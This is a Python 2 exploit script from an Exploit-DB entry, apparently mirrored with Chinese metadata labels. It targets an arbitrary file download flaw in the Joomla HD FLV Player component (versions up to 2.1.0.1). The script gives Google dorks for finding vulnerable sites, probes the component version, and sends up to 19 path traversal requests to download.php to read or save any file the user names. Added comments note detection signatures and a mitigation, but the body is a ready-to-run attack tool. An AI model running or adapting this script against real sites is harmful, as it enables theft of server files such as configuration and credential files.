Joomla! Component com_hdflvplayer < 2.1.0.1 - Arbitrary File Download

  • 作者: Claudio Viviani
    日期: 2014-11-15
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/35246/
  • #!/usr/bin/env python
    #
    # Exploit Title :Joomla HD FLV 2.1.0.1 and below Arbitrary File Download Vulnerability
    #
    # Exploit Author : Claudio Viviani
    #
    # Vendor Homepage : http://www.hdflvplayer.net/
    #
    # Software Link : http://www.hdflvplayer.net/download_count.php?pid=5
    #
    # Dork google 1:inurl:/component/hdflvplayer/
    # Dork google 2:inurl:com_hdflvplayer
    #
    # Date : 2014-11-11
    #
    # Tested on : BackBox 3.x/4.x
    #
    # Info: 
    # Url: http://target/components/com_hdflvplayer/hdflvplayer/download.php?f=
    # The "f" request parameter is used unsanitized (no path validation), which is what the traversal below relies on.
    # Over 80.000 downloads (statistic reported on official site)
    #
    #
    # Video Demo: http://youtu.be/QvBTKFLBQ20
    #
    #
    # Http connection
    import urllib, urllib2
    # String manipulation
    import re
    # Time management
    import time
    # Args management
    import optparse
    # Error management
    import sys
    
    # ASCII-art banner printed before the option help and before the probes run.
    # The "<= 2.1.0.1" line states the affected version range named in the header.
    banner = """
    _________ ___ ___ ______
     | _ .-----.-----.--------|.---.-. | Y | _\\
     |___| |_|_|||_| |.1 |.| \\
     |.| |_____|_____|__|__|__|__|___._| |._ |.|\\
     |:1 | |:| |:1/
     |::.. . | |::.|:. |::.. . /
     `-------' `--- ---`------'
    _______ ___ ___ ___ _______ __
     | _ | | | Y | | _ |.---.-.--.--.-----.----.
     |.1___|.| |.| | |.1 ||_|||-__| _|
     |.__) |.|___|.| | |.____|__|___._|___|_____|__|
     |:| |:1 |:1 | |:||_____|
     |::.| |::.. . |\:.. ./|::.|
     `---' `-------' `---' `---'
    
     <= 2.1.0.1 4rb1tr4ry F1l3 D0wnl04d
    
    Written by:
    
    Claudio Viviani
    
     http://www.homelab.it
    
    info@homelab.it
    homelabit@protonmail.ch
    
    https://www.facebook.com/homelabit
    https://twitter.com/homelabit
    https://plus.google.com/+HomelabIt1/
    https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
    """
    
    # Check url
    # Require an explicit scheme on the target URL supplied with -t.
    # url: the raw command-line string.
    # Returns url unchanged when it starts with "https://" or "http://";
    # otherwise prints an error and terminates the process with status 1.
    # Only the prefix is tested; host, port and path are not validated.
    def checkurl(url):
    if url[:8] != "https://" and url[:7] != "http://":
    print('[X] You must insert http:// or https:// procotol')
    sys.exit(1)
    else:
    return url
    
    
    # Intended presence check for the component's download.php endpoint.
    # url: base URL already validated by checkurl(); headers: dict of HTTP headers.
    # Returns None.
    # NOTE: urllib2.Request() only constructs the request object and urlopen() is
    # never called in this function, so no traffic is sent from here: the FOUND
    # message is printed unconditionally and the two except branches cannot be
    # reached. The first request the script actually sends is in checkversion().
    def checkcomponent(url,headers):
    
    try:
    req = urllib2.Request(url+'/components/com_hdflvplayer/hdflvplayer/download.php', None, headers)
    sys.stdout.write("\r[+] Searching HD FLV Extension...: FOUND")
    print("")
    except urllib2.HTTPError:
    sys.stdout.write("\r[+] Searching HD FLV Extension...: Not FOUND :(")
    sys.exit(1)
    except urllib2.URLError:
    print '[X] Connection Error'
    
    # Version probe: GET /modules/mod_hdflvplayer/mod_hdflvplayer.xml (the module
    # manifest) and print the text of its <version> element.
    # url: validated base URL; headers: dict of HTTP headers sent with the request.
    # Returns None. An HTTP error status prints "Unknown" and continues; a
    # connection-level URLError prints an error and exits with status 1.
    # From a defender's side this is a plain unauthenticated manifest fetch and is
    # the first request this script emits against the site.
    def checkversion(url,headers):
    
    try:
    req = urllib2.Request(url+'/modules/mod_hdflvplayer/mod_hdflvplayer.xml', None, headers)
    response = urllib2.urlopen(req).readlines()
    
    # Scan line by line; only lines that contain the literal "<version>" are parsed.
    for line_version in response:
    
    if not line_version.find("<version>") == -1:
    
    # Non-greedy match of the first ">...<" span on the line. This assumes the
    # closing tag is on the same line; otherwise search() returns None and
    # .group(1) raises an uncaught AttributeError.
    VER = re.compile('>(.*?)<').search(line_version).group(1)
    
    sys.stdout.write("\r[+] Checking Version: "+str(VER))
    print("")
    
    except urllib2.HTTPError:
     sys.stdout.write("\r[+] Checking Version: Unknown")
    
    except urllib2.URLError:
    print("\n[X] Connection Error")
    sys.exit(1)
    
    # Traversal loop against download.php.
    # url: validated base URL; headers: dict of HTTP headers; pathtrav: the file
    # path given with -f, appended verbatim after the traversal prefix.
    # Returns True once a response is accepted and the user has chosen D or R;
    # returns None (after printing "File not found or fixed component") otherwise.
    #
    # Detection notes (what this function puts on the wire): up to 19 GET requests
    # to /components/com_hdflvplayer/hdflvplayer/download.php whose "f" value starts
    # with 1..19 repetitions of "../" followed by the requested path, all carrying the
    # fixed User-Agent defined at module level. On success the same URL is fetched a
    # second time when the user picks [D]ownload. Mitigation on the server side is to
    # reject or canonicalize the "f" value so it cannot escape the intended directory.
    def connection(url,headers,pathtrav):
    
    char = "../"
    bar = "#"
    s = ""
    barcount = ""
    
    # range(1,20): 19 iterations; s grows by one "../" per pass and barcount by one "#".
    for a in range(1,20):
    
    s += char
    barcount += bar
    sys.stdout.write("\r[+] Exploiting...please wait: "+barcount)
    sys.stdout.flush()
    
    try:
    req = urllib2.Request(url+'/components/com_hdflvplayer/hdflvplayer/download.php?f='+s+pathtrav, None, headers)
    response = urllib2.urlopen(req)
    
    content = response.read()
    
    # Acceptance test: a non-empty body that does not contain the PHP warning text
    # "failed to open stream". Any other 200 response (e.g. an HTML error page) is
    # treated as success too.
    if content != "" and not "failed to open stream" in content:
    print("\n[!] VULNERABLE")
    print("[*] 3v1l Url: "+url+"/components/com_hdflvplayer/hdflvplayer/download.php?f="+s+pathtrav)
    print("")
    print("[+] Do you want [D]ownload or [R]ead the file?")
    print("[+]")
    sys.stdout.write("\r[+] Please respond with 'D' or 'R': ")
    
    download = set(['d'])
    read= set(['r'])
    
    # Interactive prompt (Python 2 raw_input). D: re-fetch the URL and write it to
    # the current working directory under the last path segment of pathtrav.
    # R: print the body already read. Both return True; anything else re-prompts.
    while True:
    choice = raw_input().lower()
    if choice in download:
    filedown = pathtrav.split('/')[-1]
    urllib.urlretrieve (url+"/components/com_hdflvplayer/hdflvplayer/download.php?f="+s+pathtrav, filedown)
    print("[!] DOWNLOADED!")
    print("[!] Check file: "+filedown)
    return True
    elif choice in read:
    print("")
    print content
    return True
    else:
    sys.stdout.write("\r[X] Please respond with 'D' or 'R': ")
    
    # HTTP error statuses (404 etc.) are silently skipped and the loop continues.
    except urllib2.HTTPError:
    #print '[X] HTTP Error'
    pass
    # A connection-level failure only prints; the loop is not aborted.
    except urllib2.URLError:
    print '\n[X] Connection Error'
    
    # Indentation is lost in this rendering, so whether sleep(1) runs once per
    # iteration or once after the loop cannot be determined here.
    time.sleep(1)
    print("\n[X] File not found or fixed component :(")
    
    # Command-line handling: -t/--target (base URL) and -f/--file (path to request).
    commandList = optparse.OptionParser('usage: %prog -t URL -f FILENAME')
    commandList.add_option('-t', '--target', action="store",
    help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
    )
    commandList.add_option('-f', '--file', action="store",
    help="Insert file to check",
    )
    options, remainder = commandList.parse_args()
    
    # Check args
    # Both options are mandatory; otherwise print banner + help and exit 1.
    if not options.target or not options.file:
    print(banner)
    commandList.print_help()
    sys.exit(1)
    
    print(banner)
    
    url = checkurl(options.target)
    pathtrav = options.file
    
    # Single static User-Agent used for every request below; together with the
    # download.php?f=../ pattern it is a usable log signature for this tool.
    headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'}
    
    # Run order: presence check (sends nothing, see checkcomponent), version probe, traversal loop.
    sys.stdout.write("\r[+] Searching HD FLV Extension...: ")
    checkcomponent(url,headers)
    sys.stdout.write("\r[+] Checking Version: ")
    checkversion(url,headers)
    sys.stdout.write("\r[+] Exploiting...please wait:")
    connection(url,headers,pathtrav)